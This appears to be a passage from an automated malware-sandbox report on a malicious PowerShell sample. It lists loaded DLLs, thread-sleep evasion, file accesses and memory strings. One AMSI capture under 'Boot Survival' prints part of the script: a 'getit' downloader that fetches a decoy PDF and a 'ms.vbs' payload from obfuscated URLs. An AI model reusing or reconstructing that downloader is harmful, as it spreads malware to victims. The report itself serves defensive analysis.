Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msvcp110_win.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: taskflowdataengine.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wintypes.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cdp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: umpdc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: dsreg.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: onecorecommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll (reported 2 times)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: edputil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.staterepositoryps.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dlnashext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wpdshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
      Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: esent.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
      Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
      Source: Window RecorderWindow detected: More than 3 window changes detected
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
      Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1554956460.0000011073522000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1554760790.000001107350D000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_64\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb source: powershell.exe, 00000000.00000002.1784611559.000001CA7336F000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: mscorlib.pdb source: powershell.exe, 00000000.00000002.1682847093.000001CA590C2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000000.00000002.1781902419.000001CA73110000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 6?ll\System.pdbdir=C: source: powershell.exe, 00000000.00000002.1786312887.000001CA733E2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: System.pdbgement.Automation.pdb source: powershell.exe, 00000000.00000002.1682847093.000001CA590C2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdb/ source: powershell.exe, 00000003.00000002.1553719635.00000110734A7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000000.00000002.1784611559.000001CA7333C000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1553460210.0000011073469000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb source: powershell.exe, 00000000.00000002.1784611559.000001CA7336F000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1552154954.00000110733B2000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: n.pdbW source: powershell.exe, 00000003.00000002.1553719635.00000110734A7000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: ion.pdb56l source: powershell.exe, 00000003.00000002.1553460210.0000011073469000.00000004.00000020.00020000.00000000.sdmp
      Source: Binary string: 6?t.Automation.pdb& source: powershell.exe, 00000003.00000002.1554229305.00000110734B6000.00000004.00000020.00020000.00000000.sdmp
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00007FFB4B0A0D6C push eax; ret 3_2_00007FFB4B0A0D6D

      Boot Survival

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: .lnk -Name));getit -fz ($fzf + 'List of Required items and services.pdf') -oulv 'htnobwww.astacmntacmrprisacms.com.pk/ms/List%20of%20racmquiracmd%20itacmms%20and%20sacmrvicacms.pdf';getit -fz $flol -oulv 'http://www.bluacmmaxxlasacmr.com/ms/ms.vbs';exit@{# Script module or binary module file associated with this manifest.ModuleToProcess = 'Pester.psm1'# Version number of this module.ModuleVersion = '3.4.0'# ID used to uniquely identify this moduleGUID = 'a699dea5-2c73-4616-a270-1f7abb777e71'# Author of this moduleAuthor = 'Pester Team'# Company or vendor of this moduleCompanyName = 'Pester'# Copyright statement for this moduleCopyright = 'Copyright (c) 2016 by Pester Team, licensed under Apache 2.0 License.'# Description of the functionality provided by this moduleDescription = 'Pester provides a framework for running BDD style Tests to execute and validate PowerShell commands inside of PowerShell and offers a powerful set of Mocking Functions that allow tests to mimic and mock the functionality of any command inside of a piece of powershell code being tested. Pester tests can execute any command or script that is accesible to a pester test file. This can include functions, Cmdlets, Modules and scripts. 
Pester can be run in ad hoc style in a console or it can be integrated into the Build scripts of a Continuous Integration system.'# Minimum version of the Windows PowerShell engine required by this modulePowerShellVersion = '2.0'# Functions to export from this moduleFunctionsToExport = @( 'Describe', 'Context', 'It', 'Should', 'Mock', 'Assert-MockCalled', 'Assert-VerifiableMocks', 'New-Fixture', 'Get-TestDriveItem', 'Invoke-Pester', 'Setup', 'In', 'InModuleScope', 'Invoke-Mock', 'BeforeEach', 'AfterEach', 'BeforeAll', 'AfterAll' 'Get-MockDynamicParameters', 'Set-DynamicParameterVariables', 'Set-TestInconclusive', 'SafeGetCommand', 'New-PesterOption')# # Cmdlets to export from this module# CmdletsToExport = '*'# Variables to export from this moduleVariablesToExport = @( 'Path', 'TagFilter', 'ExcludeTagFilter', 'TestNameFilter', 'TestResult', 'CurrentContext', 'CurrentDescribe', 'CurrentTest', 'SessionState', 'CommandCoverage', 'BeforeEach', 'AfterEach', 'Strict')# # Aliases to export from this module# AliasesToExport = '*'# List of all modules packaged with this module# ModuleList = @()# List of all files packaged with this module# FileList = @()PrivateData = @{ # PSData is module packaging and gallery metadata embedded in PrivateData # It's for rebuilding PowerShellGet (and PoshCode) NuGet-style packages # We had to do this because it's the only place we're allowed to extend the manifest # https://connect.microsoft.com/PowerShell/feedback/details/421837 PSData = @{ # The primary categorization of this module (from the TechNet Gallery tech tree). Category = "Scripting Techniques" # Keyword tags to help use

      Hooking and other Techniques for Hiding and Protection

      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Windows\system32\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe | Process information set: NOOPENFILEERRORBOX
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3298
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6404
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 6265
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Window / User API: threadDelayed 3440
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3660 | Thread sleep time: -12912720851596678s >= -30000s
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4936 | Thread sleep count: 6265 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4940 | Thread sleep count: 3440 > 30
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6768 | Thread sleep time: -9223372036854770s >= -30000s
      Source: C:\Windows\System32\svchost.exe TID: 5484 | Thread sleep time: -30000s >= -30000s
      Source: C:\Windows\System32\svchost.exe | File opened: PhysicalDrive0
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Thread delayed: delay time: 922337203685477
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.ini
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming
      Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File opened: C:\Users\user\AppData\Roaming\Microsoft
      Source: powershell.exe, 00000003.00000002.1516410513.0000011001C2A000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: tEventVmNetworkAdapter',
